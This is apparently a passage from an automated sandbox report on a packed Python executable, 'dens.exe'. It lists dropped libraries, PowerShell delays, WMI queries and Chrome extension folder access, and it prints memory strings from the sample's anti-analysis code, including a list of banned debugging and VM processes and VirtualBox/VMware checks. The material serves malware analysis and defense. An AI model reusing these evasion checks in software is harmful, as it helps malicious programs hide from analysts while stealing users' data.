            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3292
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 577
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4938
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 712
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_brotli.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_helpers_c.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_parser.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\frozenlist\_frozenlist.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_websocket.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_quoting_c.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_wmi.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_writer.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\multidict\_multidict.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_helpers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18054
            Source: C:\Users\user\Desktop\dens.exeAPI coverage: 5.5 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep count: 3292 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 577 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7324Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4588Thread sleep count: 4938 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep count: 712 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Users\user\Desktop\dens.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F9280 FindFirstFileExW,FindClose,0_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0F9280 FindFirstFileExW,FindClose,1_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB811E0 GetSystemInfo,1_2_00007FFDFAB811E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E: Hyper-V Guest Service
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe", # VMware
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop V
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7OvmwarePw
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe", # VirtualBox
            Source: dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 0000003D.00000002.1822300778.0000026B06DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
            Source: dens.exe, 00000001.00000003.1701486676.000002D9AAD26000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041342997.000002D9AACF1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042938657.000002D9AAD34000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045840713.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1699132510.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2051391013.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1697078084.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2058860933.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1696439960.000002D9AAD26000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2049260177.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703254242.000002D9AAD26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWwQ
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: svchost.exe, 00000034.00000002.2910895034.000001DE8AE2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwaretray.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elif b"vmware" in stdout2.lower():
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe"P
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareuser.exe0
            Source: svchost.exe, 00000034.00000002.2912409227.000001DE8C45C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe", # VirtualBox
            Source: ROUTE.EXE, 00000047.00000002.1849023843.0000029FC3A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
            Source: dens.exe, 00000001.00000003.2054326320.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040249734.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066912837.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036645214.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: mKVMwarev
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b"vmware"
            Source: net1.exe, 0000003D.00000002.1822300778.0000026B06DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe", # VMware
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ME: Hyper-V Guest Shutdo|
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxtray.exep
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 7Ovmware
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe", # VirtualBox
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe" e
